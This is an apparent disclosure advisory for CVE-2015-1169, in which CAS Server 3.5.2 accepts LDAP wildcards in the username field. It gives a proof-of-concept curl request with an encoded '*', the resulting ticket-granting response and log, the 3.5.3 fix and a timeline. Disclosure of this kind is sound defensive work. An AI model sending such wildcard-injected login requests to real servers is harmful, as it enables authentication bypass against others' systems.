=====[Alligator Security Team - Security Advisory]========
CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP
authentication via crafted wildcards.
Reporter: Jos Tozo < juniorbsd () gmail com >
=====[Table of Contents]==================================
1. Background
2. Detailed description
3. Other contexts & solutions
4. Timeline
5. References
=====[1. Background]======================================
CAS is an authentication system originally created by Yale University to
provide a trusted way for an application to authenticate a user.
=====[2. Detailed description]============================
A valid username and password required.
Given a username johndoe and a password superpass, you can sucessfully
achieve login using wildcards:
username: jo*
password: superpass
The login will be sucessfully only if the ldap bind search return one
unique member.
The vulnerability described in this document can be validated using the
following example:
Client Request:
root@machine:/# curl -k -L -d "username=jo%2A&password=superpass"
https://login.cas-server.com/v1/tickets
(note that * was url encoded to %2A)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>201 The request has been fulfilled and resulted in a new
resource being created</title>
</head>
<body>
<h1>TGT Created</h1>
<form action="
https://xxx.xxx.xxx.xxx/v1/tickets/TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz"
method="POST">Service:<input type="text" name="service" value=""><br><input
type="submit" value="Submit"></form>
</body>
</html>
Server log:
=============================================================
WHO: [username: jo*]
WHAT: TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz
ACTION: TICKET_GRANTING_TICKET_CREATED
APPLICATION: CAS
WHEN: Tue Jan 20 18:38:17 BRST 2015
CLIENT IP ADDRESS: xxx.xxx.xxx.xxx
SERVER IP ADDRESS: xxx.xxx.xxx.xxx
=============================================================
=====[3. Other contexts & solutions]======================
In order to apply the patch, you have to update at least to version 3.5.3.
Newer versions, such as CAS 4.0.0 and above, are not vulnerable.
=====[4. Timeline]========================================
29/12/14 Vendor notification.
14/01/15 Vendor rolled out new version 3.5.3
17/01/15 Mitre assigned CVE-2015-1169.
21/01/15 Disclosure date.
=====[5. References]=======================================
1 - https://github.com/Jasig/cas/pull/411
2 -
https://github.com/Jasig/cas/commit/7de61b4c6244af9ff8e75a2c92a570f3b075309c
--
Grato,
Tozo